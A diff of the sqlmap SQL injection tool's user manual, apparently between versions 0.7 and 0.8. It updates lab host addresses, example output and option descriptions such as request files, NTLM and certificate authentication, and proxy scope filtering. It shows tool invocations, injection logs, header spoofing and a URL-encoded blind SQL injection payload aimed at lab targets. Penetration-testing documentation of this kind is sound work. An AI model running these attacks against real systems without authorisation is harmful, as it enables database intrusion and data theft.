    +[hh:mm:47] [DEBUG] setting the HTTP method to GET
    +[hh:mm:47] [DEBUG] creating HTTP requests opener object
    +[hh:mm:47] [DEBUG] parsing XML queries file
    +[hh:mm:47] [INFO] using '/home/inquis/sqlmap/output/172.16.213.131/session' as session file
    +[hh:mm:47] [INFO] testing connection to the target url
    +[hh:mm:47] [TRAFFIC OUT] HTTP request:
     GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
     Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
    -Host: 192.168.1.121:80
    +Host: 172.16.213.131
     Accept-language: en-us,en;q=0.5
    -Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
    -image/png,*/*;q=0.5
    -User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
    +Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    +User-agent: sqlmap/0.8
     Connection: close
     
    -[hh:mm:17] [TRAFFIC IN] HTTP response (OK - 200):
    -Date: Thu, 11 Dec 2008 hh:mm:17 GMT
    -Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch
    -X-Powered-By: PHP/5.2.6-2ubuntu4
    -Content-Length: 119
    +[hh:mm:47] [TRAFFIC IN] HTTP response (OK - 200):
    +Date: Sat, 20 Feb 2010 17:44:27 GMT
    +Server: Apache/2.2.9
    +X-Powered-By: PHP/5.2.6-1+lenny4
    +Vary: Accept-Encoding
     Connection: close
    +Transfer-Encoding: chunked
     Content-Type: text/html
     
     <html><body>
    @@ -781,33 +927,6 @@ Content-Type: text/html
     </table>
     </body></html>
     [...]
    -[hh:mm:18] [INFO] testing MySQL
    -[hh:mm:18] [INFO] query: CONCAT(CHAR(51), CHAR(51))
    -[hh:mm:18] [TRAFFIC OUT] HTTP request:
    -GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2851%29%2C%20CHAR
    -%2851%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%202581=2581 HTTP/1.1
    -Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
    -Host: 192.168.1.121:80
    -Accept-language: en-us,en;q=0.5
    -Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
    -image/png,*/*;q=0.5
    -User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
    -Connection: close
    -
    -[hh:mm:18] [TRAFFIC IN] HTTP response (OK - 200):
    -Date: Thu, 11 Dec 2008 hh:mm:18 GMT
    -Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch
    -X-Powered-By: PHP/5.2.6-2ubuntu4
    -Content-Length: 75
    -Connection: close
    -Content-Type: text/html
    -
    -<html><body>
    -<b>SQL results:</b>
    -<table border="1">
    -</table>
    -</body></html>
    -[...]
     

    @@ -817,35 +936,34 @@ Content-Type: text/html

    At least one of these options has to be specified to set the source to get -target urls from.

    +target addresses from.

    Target URL

    -

    Option: -u or --url

    +

    Option: -u or --url

    -

    To run sqlmap on a single target URL.

    +

    To run sqlmap against a single target URL.

    Example on a MySQL 5.0.67 target:

    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1"
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1"
     
     [...]
    -web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
     web application technology: PHP 5.2.6, Apache 2.2.9
    -back-end DBMS: MySQL >= 5.0.0
    +back-end DBMS: MySQL 5
     

    -

    Parse targets from Burp or WebScarab logs

    +

    Parse targets from Burp or WebScarab proxy logs

    Option: -l

    -

    Rather than providing a single target URL it is possible to test and inject -on HTTP requests proxied through +

    Rather than providing a single target URL, it is possible to test and +inject on HTTP requests proxied through Burp proxy or WebScarab proxy.

    @@ -859,7 +977,7 @@ $ python sqlmap.py -l /tmp/webscarab.log/conversations/ [hh:mm:43] [INFO] sqlmap parsed 27 testable requests from the targets list [hh:mm:43] [INFO] sqlmap got a total of 27 targets [hh:mm:43] [INPUT] url 1: -GET http://192.168.1.121:80/phpmyadmin/navigation.php?db=test&token=60747016432606019619a +GET http://172.16.213.131/phpmyadmin/navigation.php?db=test&token=60747016432606019619a c58b3780562 Cookie: PPA_ID=197bf44d671aeb7d3a28719a467d86c3; phpMyAdmin=366c9c9b329a98eabb4b708c2df8b d7d392eb151; pmaCookieVer=4; pmaPass-1=uH9%2Fz5%2FsB%2FM%3D; pmaUser-1=pInZx5iWPrA%3D; @@ -867,10 +985,10 @@ pma_charset=iso-8859-1; pma_collation_connection=utf8_unicode_ci; pma_fontsize=d pma_lang=en-utf-8; pma_mcrypt_iv=o6Mwtqw6c0c%3D; pma_theme=deleted do you want to test this url? [Y/n/q] n [hh:mm:46] [INPUT] url 2: -GET http://192.168.1.121:80/sqlmap/mysql/get_int.php?id=1 +GET http://172.16.213.131/sqlmap/mysql/get_int.php?id=1 Cookie: PPA_ID=197bf44d671aeb7d3a28719a467d86c3 do you want to test this url? [Y/n/q] y -[hh:mm:49] [INFO] testing url http://192.168.1.121:80/sqlmap/mysql/get_int.php?id=1 +[hh:mm:49] [INFO] testing url http://172.16.213.131/sqlmap/mysql/get_int.php?id=1 [hh:mm:49] [INFO] testing connection to the target url [hh:mm:49] [INFO] testing if the url is stable, wait a few seconds [hh:mm:50] [INFO] url is stable @@ -889,16 +1007,10 @@ do you want to test this url? [Y/n/q] y [hh:mm:29] [INFO] testing for parenthesis on injectable parameter [hh:mm:29] [INFO] the injectable parameter requires 0 parenthesis [hh:mm:29] [INFO] testing MySQL -[hh:mm:29] [INFO] query: CONCAT(CHAR(57), CHAR(57)) [hh:mm:29] [INFO] retrieved: 99 -[hh:mm:29] [INFO] performed 20 queries in 0 seconds [hh:mm:29] [INFO] confirming MySQL -[hh:mm:29] [INFO] query: LENGTH(CHAR(57)) [hh:mm:29] [INFO] retrieved: 1 -[hh:mm:29] [INFO] performed 13 queries in 0 seconds -[hh:mm:29] [INFO] query: SELECT 9 FROM information_schema.TABLES LIMIT 0, 1 [hh:mm:29] [INFO] retrieved: 9 -[hh:mm:29] [INFO] performed 13 queries in 0 seconds web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) web application technology: PHP 5.2.6, Apache 2.2.9 back-end DBMS: MySQL >= 5.0.0 @@ -908,7 +1020,60 @@ back-end DBMS: MySQL >= 5.0.0

    -

    Process Google dork results as target urls

    +

    Load HTTP request from a file

    + +

    Option: -r

    + +

    One of the possibilities of sqlmap is loading of complete HTTP +request packet stored in textual file. That way you can skip usage of +bunch of other options.

    + +

    Sample content of a HTTP request file:

    +

    +

    +
    +POST /sqlmap/mysql/post_int.php HTTP/1.1
    +Host: 172.16.213.131
    +User-Agent: Mozilla/4.0
    +
    +id=1
    +
    +
    +

    + +

    Example usage:

    +

    +

    +
    +$ python sqlmap.py -r request.txt
    +
    +[...]
    +[hh:mm:27] [INFO] parsing HTTP request from 'request.txt'
    +[...]
    +[hh:mm:21] [INFO] testing if POST parameter 'id' is dynamic
    +[hh:mm:22] [INFO] confirming that POST parameter 'id' is dynamic
    +[hh:mm:22] [INFO] POST parameter 'id' is dynamic
    +[hh:mm:22] [INFO] testing sql injection on POST parameter 'id' with 0 parenthesis
    +[hh:mm:22] [INFO] testing unescaped numeric injection on POST parameter 'id'
    +[hh:mm:22] [INFO] confirming unescaped numeric injection on POST parameter 'id'
    +[hh:mm:22] [INFO] POST parameter 'id' is unescaped numeric injectable with 0 parenthesis
    +[hh:mm:22] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
    +[hh:mm:22] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
    +[hh:mm:22] [INFO] testing for parenthesis on injectable parameter
    +[hh:mm:22] [INFO] the injectable parameter requires 0 parenthesis
    +[hh:mm:22] [INFO] testing MySQL
    +[hh:mm:22] [INFO] confirming MySQL
    +[hh:mm:22] [INFO] retrieved: 3
    +[hh:mm:22] [INFO] the back-end DBMS is MySQL
    +web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
    +web application technology: PHP 5.2.4, Apache 2.2.8
    +back-end DBMS: MySQL >= 5.0.0
    +
    +
    +

    + + +

    Process Google dork results as target addresses

    Option: -g

    @@ -963,7 +1128,7 @@ want to test this url? [y/N/q] y

    It is possible to pass user's options from a configuration INI file, an example is sqlmap.conf.

    -

    Example on a MySQL 5.0.67 target:

    +

    Example usage:

    @@ -984,11 +1149,12 @@ the provided configuration file.

    5.3 Request

    -

    These options can be used to specify how to connect to the target url.

    +

    These options can be used to specify how to connect to the target +application.

    HTTP method: GET or POST

    -

    Options: --method and --data

    +

    Options: --method and --data

    By default the HTTP method used to perform HTTP requests is GET, but you can change it to POST and provide the data to be sent @@ -999,7 +1165,7 @@ tested for SQL injection like the GET parameters.

    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/post_int.php" --method POST \
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/post_int.php" --method POST \
       --data "id=1"
     
     [hh:mm:53] [INFO] testing connection to the target url
    @@ -1014,13 +1180,9 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/post_int.php" --method
     [hh:mm:54] [INFO] POST parameter 'id' is numeric/unescaped injectable
     [...]
     [hh:mm:54] [INFO] testing Oracle
    -[hh:mm:54] [INFO] query: LENGTH(SYSDATE)
     [hh:mm:54] [INFO] retrieved: 9
    -[hh:mm:54] [INFO] performed 13 queries in 0 seconds
     [hh:mm:54] [INFO] confirming Oracle
    -[hh:mm:54] [INFO] query: SELECT VERSION FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1
     [hh:mm:54] [INFO] retrieved: 10.2.0.1.0
    -[hh:mm:55] [INFO] performed 76 queries in 0 seconds
     web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
     web application technology: PHP 5.2.6, Apache 2.2.9
     back-end DBMS:    Oracle
    @@ -1031,7 +1193,7 @@ back-end DBMS:    Oracle
     
     

    HTTP Cookie header

    -

    Option: --cookie

    +

    Options: --cookie, --cookie-urlencode and --drop-set-cookie

    This feature can be useful in two scenarios:

    @@ -1061,7 +1223,7 @@ value to the clipboard.

    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/cookie_int.php" --cookie \
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/cookie_int.php" --cookie \
       "id=1" -v 1
     
     [hh:mm:37] [INFO] testing connection to the target url
    @@ -1079,30 +1241,31 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/cookie_int.php" --cooki
     

    -

    Note that the HTTP Cookie header values are separated by a -; character, not by an &.

    +

    Note that the HTTP Cookie header values are usually separated by +a ; character, not by an &.

    -

    If the web application at first HTTP response has within the HTTP headers -a Set-Cookie header, sqlmap will automatically use it in all HTTP -requests as the HTTP Cookie header and also test for SQL -injection on these values.

    +

    If the web application at first HTTP response has a Set-Cookie +header, sqlmap will automatically use it's value in all further HTTP +requests as the Cookie header. sqlmap will also automatically +test that value for SQL injection, except if you run it with +--drop-set-cookie option.

    Example on a Microsoft SQL Server 2000 Service Pack 0 target:

    -$ python sqlmap.py -u "http://192.168.1.125/sqlmap/get_str.asp?name=luther" -v 3
    +$ python sqlmap.py -u "http://172.16.213.128/sqlmap/get_str.asp?name=luther" -v 3
     
     [...]
     [hh:mm:39] [INFO] testing connection to the target url
     [hh:mm:39] [TRAFFIC OUT] HTTP request:
     GET /sqlmap/get_str.asp?name=luther HTTP/1.1
     Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
    -Host: 192.168.1.125:80
    +Host: 172.16.213.128:80
     Accept-language: en-us,en;q=0.5
     Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
     image/png,*/*;q=0.5
    -User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
    +User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
     Cookie: ASPSESSIONIDSABTRCAS=HPCBGONANJBGFJFHGOKDMCGJ
     Connection: close
     
    @@ -1113,12 +1276,12 @@ Connection: close
     [hh:mm:40] [TRAFFIC OUT] HTTP request:
     GET /sqlmap/get_str.asp?name=luther HTTP/1.1
     Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
    -Host: 192.168.1.125:80
    +Host: 172.16.213.128:80
     Accept-language: en-us,en;q=0.5
     Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
     image/png,*/*;q=0.5
     Cookie: ASPSESSIONIDSABTRCAS=469
    -User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
    +User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
     Connection: close
     
     [hh:mm:40] [WARNING] Cookie parameter 'ASPSESSIONIDSABTRCAS' is not dynamic
    @@ -1135,7 +1298,7 @@ in the following HTTP requests.

    -$ python sqlmap.py -u "http://192.168.1.125/sqlmap/get_str.asp?name=luther" --cookie "id=1"
    +$ python sqlmap.py -u "http://172.16.213.128/sqlmap/get_str.asp?name=luther" --cookie "id=1"
     
     [hh:mm:51] [INPUT] you provided an HTTP Cookie header value. The target url provided its
     own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP cookie
    @@ -1144,61 +1307,32 @@ values that you provided? [Y/n]
     

    - -

    HTTP Referer header

    - -

    Option: --referer

    - -

    It is possible to fake the HTTP Referer header value with this -option. By default no HTTP Referer heder is sent in HTTP -requests.

    - -

    Example on a PostgreSQL 8.3.5 target:

    -

    -

    -
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --referer \
    -  "http://www.google.com" -v 3
    -
    -[...]
    -[hh:mm:48] [INFO] testing connection to the target url
    -[hh:mm:48] [TRAFFIC OUT] HTTP request:
    -GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
    -Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
    -Host: 192.168.1.121:80
    -Accept-language: en-us,en;q=0.5
    -Referer: http://www.google.com
    -Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
    -image/png,*/*;q=0.5
    -User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
    -Connection: close
    -[...]
    -
    -
    -

    +

    sqlmap by default doesn't URL encode generated cookie injections, but you can force it by +using the --cookie-urlencode flag. Cookie content encoding is not declared +by standard in any way, so it's solely the matter of web application's behaviour.

    HTTP User-Agent header

    -

    Options: --user-agent and -a

    +

    Options: --user-agent and -a

    By default sqlmap perform HTTP requests providing the following HTTP User-Agent header value:

    -sqlmap/0.7 (http://sqlmap.sourceforge.net)
    +sqlmap/0.8 (http://sqlmap.sourceforge.net)
     

    -

    It is possible to fake it with the --user-agent option.

    +

    It is possible to fake it with the --user-agent option.

    Example on an Oracle XE 10.2.0.1 target:

    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" \
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/oracle/get_int.php?id=1" \
       --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3
     
     [...]
    @@ -1206,7 +1340,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" \
     [hh:mm:02] [TRAFFIC OUT] HTTP request:
     GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
     Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
    -Host: 192.168.1.121:80
    +Host: 172.16.213.131
     Accept-language: en-us,en;q=0.5
     Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
     image/png,*/*;q=0.5
    @@ -1226,7 +1360,7 @@ and use it for all HTTP requests.

    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 \
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1 \
       -a "./txt/user-agents.txt"
     
     [hh:mm:00] [DEBUG] initializing the configuration
    @@ -1242,7 +1376,7 @@ Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)
     [hh:mm:00] [TRAFFIC OUT] HTTP request:
     GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
     Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
    -Host: 192.168.1.121:80
    +Host: 172.16.213.131
     Accept-language: en-us,en;q=0.5
     Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
     image/png,*/*;q=0.5
    @@ -1272,31 +1406,64 @@ to force the HTTP User-Agent header with option --user-agent or -a
     

    +

    HTTP Referer header

    + +

    Option: --referer

    + +

    It is possible to fake the HTTP Referer header value with this +option. By default no HTTP Referer header is sent in HTTP +requests.

    + +

    Example on a PostgreSQL 8.3.5 target:

    +

    +

    +
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" --referer \
    +  "http://www.google.com" -v 3
    +
    +[...]
    +[hh:mm:48] [INFO] testing connection to the target url
    +[hh:mm:48] [TRAFFIC OUT] HTTP request:
    +GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
    +Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
    +Host: 172.16.213.131
    +Accept-language: en-us,en;q=0.5
    +Referer: http://www.google.com
    +Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
    +image/png,*/*;q=0.5
    +User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
    +Connection: close
    +[...]
    +
    +
    +

    + +

    Extra HTTP headers

    -

    Option: --headers

    +

    Option: --headers

    -

    It is possible to provide extra HTTP headers by providing --headers -options. Each header must be separated by a "\n" string and it's much easier +

    It is possible to provide extra HTTP headers by providing --headers +options. Each header must be separated by a newline and it's much easier to provide them from the configuration INI file. Have a look at the sample sqlmap.conf file.

    -

    HTTP Basic and Digest authentications

    +

    HTTP Basic, Digest and NTLM authentications

    -

    Options: --auth-type and --auth-cred

    +

    Options: --auth-type and --auth-cred

    These options can be used to specify which HTTP authentication type the web server implements and the valid credentials to be used to perfom all -HTTP requests to the target URL. -The two valid types are Basic and Digest and the -credentials' syntax is username:password.

    +HTTP requests to the target application. +The three valid types are Basic, Digest and NTLM, +while the credentials' syntax is username:password.

    Examples on a MySQL 5.0.67 target:

    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1" \
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/basic/get_int.php?id=1" \
       --auth-type Basic --auth-cred "testuser:testpass" -v 3
     
     [...]
    @@ -1304,17 +1471,17 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1"
     [hh:mm:14] [TRAFFIC OUT] HTTP request:
     GET /sqlmap/mysql/basic/get_int.php?id=1 HTTP/1.1
     Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
    -Host: 192.168.1.121:80
    +Host: 172.16.213.131
     Accept-language: en-us,en;q=0.5
     Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
     image/png,*/*;q=0.5
     Authorization: Basic dGVzdHVzZXI6dGVzdHBhc3M=
    -User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
    +User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
     Connection: close
     [...]
     
     
    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/digest/get_int.php?id=1" \
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/digest/get_int.php?id=1" \
       --auth-type Digest --auth-cred "testuser:testpass" -v 3
     
     [...]
    @@ -1322,7 +1489,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/digest/get_int.php?id=1
     [hh:mm:54] [TRAFFIC OUT] HTTP request:
     GET /sqlmap/mysql/digest/get_int.php?id=1 HTTP/1.1
     Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
    -Host: 192.168.1.121:80
    +Host: 172.16.213.131
     Accept-language: en-us,en;q=0.5
     Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
     image/png,*/*;q=0.5
    @@ -1330,7 +1497,7 @@ Authorization: Digest username="testuser", realm="Testing digest authentication"
     nonce="Qw52C8RdBAA=2d7eb362292b24718dcb6e4d9a7bf0f13d58fa9d", 
     uri="/sqlmap/mysql/digest/get_int.php?id=1", response="16d01b08ff2f77d8ff0183d706f96747", 
     algorithm="MD5", qop=auth, nc=00000001, cnonce="579be5eb8753693a"
    -User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
    +User-agent: sqlmap/0.8 (http://sqlmap.sourceforge.net)
     Connection: close
     [...]
     
    @@ -1338,9 +1505,30 @@ Connection: close

    +

    HTTP Certificate authentication

    + +

    Option: --auth-cert

    +

    This option should be used in cases when the web server requires proper user's +certificate for authentication. Supplied values should be in the form: key_file, +cert_file, where key_file should be the name of a PEM formatted file that +contains your private key, while cert_file should be the name for a PEM formatted +certificate chain file.

    + +

    Example:

    +

    +

    +
    +$ python sqlmap.py -u "http://www.example.com/process.php?id=1" \
    +  --auth-cert key.pem,cert.pem
    +[...]
    +
    +
    +

    + +

    HTTP proxy

    -

    Option: --proxy

    +

    Option: --proxy and --ignore-proxy

    It is possible to provide an anonymous HTTP proxy address to pass by the HTTP requests to the target URL. The syntax of HTTP proxy value is @@ -1350,8 +1538,8 @@ HTTP requests to the target URL. The syntax of HTTP proxy value is

    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
    -  --proxy "http://192.168.1.47:3128"
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" \
    +  --proxy "http://172.16.213.1:8080"
     
     [hh:mm:36] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
     [hh:mm:36] [WARNING] GET parameter 'cat' is not dynamic
    @@ -1372,8 +1560,8 @@ as explained on the
     

    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
    -  --proxy "http://192.168.1.47:8118"
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" \
    +  --proxy "http://172.16.213.1:8118"
     

    @@ -1381,10 +1569,14 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \

    Note that 8118 is the default Privoxy port, adapt it to your settings.

    +

    The option --ignore-proxy should be used in cases like +when you want to run sqlmap against the machine inside a local area +network skipping default usage of a system-wide set HTTP proxy server.

    +

    Concurrent HTTP requests

    -

    Option: --threads

    +

    Option: --threads

    It is possible to specify the number of maximum concurrent HTTP requests that sqlmap can start when it uses the blind SQL injection technique to @@ -1396,7 +1588,7 @@ This feature relies on the

    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 \
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1 \
       --current-user --threads 3
     
     [...]
    @@ -1406,12 +1598,9 @@ back-end DBMS: MySQL >= 5.0.0
     
     [hh:mm:18] [INFO] fetching current user
     [hh:mm:18] [INFO] retrieving the length of query output
    -[hh:mm:18] [INFO] query: IFNULL(CAST(LENGTH(CURRENT_USER()) AS CHAR(10000)), CHAR(32))
     [hh:mm:18] [INFO] retrieved: 18
    -[hh:mm:19] [INFO] query: IFNULL(CAST(CURRENT_USER() AS CHAR(10000)), CHAR(32))
     [hh:mm:19] [INFO] starting 3 threads
     [hh:mm:19] [INFO] retrieved: testuser@localhost
    -[hh:mm:19] [INFO] performed 126 queries in 0 seconds
     current user:    'testuser@localhost'
     
    @@ -1424,13 +1613,13 @@ HTTP requests, the maximum requests to retrieve a query output character with the blind SQL injection bisection algorithm implemented in sqlmap.

    Note that the multithreading option is not needed if the target is affected -by an inband SQL injection vulnerability and the --union-use +by an inband SQL injection vulnerability and the --union-use option has been provided.

    Delay in seconds between each HTTP request

    -

    Option: --delay

    +

    Option: --delay

    It is possible to specify a number of seconds to wait between each HTTP request. The valid value is a float, for instance 0.5 means half a second.

    @@ -1438,7 +1627,7 @@ request. The valid value is a float, for instance 0.5 means half a second.

    Seconds to wait before timeout connection

    -

    Option: --timeout

    +

    Option: --timeout

    It is possible to specify a number of seconds to wait before considering the HTTP request timed out. The valid value is a float, for instance @@ -1447,12 +1636,29 @@ the HTTP request timed out. The valid value is a float, for instance

    Maximum number of retries when the HTTP connection timeouts

    -

    Option: --retries

    +

    Option: --retries

    It is possible to specify the maximum number of retries when the HTTP connection timeouts. By default it retries up to three times.

    +

    Filtering targets from provided proxy log using regular expression

    + +

    Option: --scope

    + +

    Rather than using all hosts parsed from provided logs with option +-l, in combination with this option you can specify valid +python regular expression to be used for filtering desired ones.

    +

    Example usage:

    +

    +

    +
    +$ python sqlmap.py -l /tmp/webscarab.log/conversations/ --scope="(www)?\.target\.(com|net|org)"
    +
    +
    +

    + +

    5.4 Injection

    @@ -1460,6 +1666,7 @@ connection timeouts. By default it retries up to three times.

    custom injection payloads and how to parse and compare HTTP responses page content when using the blind SQL injection technique.

    +

    Testable parameter(s)

    Option: -p

    @@ -1474,7 +1681,7 @@ injection test and inject directly only against the provided parameter(s).

    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 1 \
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -v 1 \
       -p "id"
     
     [hh:mm:48] [INFO] testing connection to the target url
    @@ -1498,7 +1705,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 1
     

    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 \
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 \
       -p "cat,id"
     
    @@ -1510,8 +1717,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&ca

    -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 \
    -  -p "user-agent" --user-agent "sqlmap/0.7 (http://sqlmap.sourceforge.net)"
    +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/ua_str.php" -v 1 \
    +  -p "user-agent" --user-agent "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
     
     [hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
     [hh:mm:40] [INFO] testing connection to the target url
    @@ -1529,16 +1736,10 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 \
     [hh:mm:41] [INFO] testing for parenthesis on injectable parameter
     [hh:mm:41] [INFO] the injectable parameter requires 0 parenthesis
     [hh:mm:41] [INFO] testing MySQL
    -[hh:mm:41] [INFO] query: CONCAT(CHAR(52), CHAR(52))
     [hh:mm:41] [INFO] retrieved: 44
    -[hh:mm:41] [INFO] performed 20 queries in 0 seconds
     [hh:mm:41] [INFO] confirming MySQL
    -[hh:mm:41] [INFO] query: LENGTH(CHAR(52))
     [hh:mm:41] [INFO] retrieved: 1
    -[hh:mm:41] [INFO] performed 13 queries in 0 seconds
    -[hh:mm:41] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
     [hh:mm:41] [INFO] retrieved: 4
    -[hh:mm:41] [INFO] performed 13 queries in 0 seconds
     web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
     web application technology: PHP 5.2.6, Apache 2.2.9
     back-end DBMS: MySQL >= 5.0.0
    @@ -1549,11 +1750,11 @@ back-end DBMS: MySQL >= 5.0.0
     
     

    Force the database management system name

    -

    Option: --dbms

    +

    Option: --dbms

    By default sqlmap automatically detects the web application's back-end -database manangement system. -At the moment the fully supported database management system are four:

    +database management system. +At the moment, fully supported database management systems are:

    • MySQL
    • @@ -1566,15 +1767,15 @@ At the moment the fully supported database management system are four:

      It is possible to force the DBMS name if you already know it so that sqlmap will skip the fingerprint with an exception for MySQL and Microsoft SQL Server to only identify the version. -To avoid also this check you can provide instead MySQL VERSION or -Microsoft SQL Server VERSION where version is a valid version for -the DBMS, for instance 5.0 for MySQL and 2005 for +To avoid also this check you can provide instead MySQL <version> or +Microsoft SQL Server <version>, where <version> is a valid version for +the DBMS; for instance 5.0 for MySQL and 2005 for Microsoft SQL Server.

      Example on a PostgreSQL 8.3.5 target:

      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 2 \
      +$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -v 2 \
         --dbms "PostgreSQL"
       
       [...]
      @@ -1587,7 +1788,7 @@ back-end DBMS:    PostgreSQL
       

      -

      In case you provide --fingerprint together with --dbms, +

      In case you provide --fingerprint together with --dbms, sqlmap will only perform the extensive fingerprint for the specified database management system, read below for further details.

      @@ -1599,10 +1800,10 @@ automatically identify it for you.

      Force the database management system operating system name

      -

      Option: --os

      +

      Option: --os

      By default sqlmap automatically detects the web application's back-end -database manangement system underlying operating system when requested by +database management system underlying operating system when requested by any other functionality. At the moment the fully supported operating systems are two:

      @@ -1623,7 +1824,7 @@ not know it, let sqlmap automatically identify it for you.

      Custom injection payload

      -

      Options: --prefix and --postfix

      +

      Options: --prefix and --postfix

      In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. @@ -1637,7 +1838,7 @@ postfix.

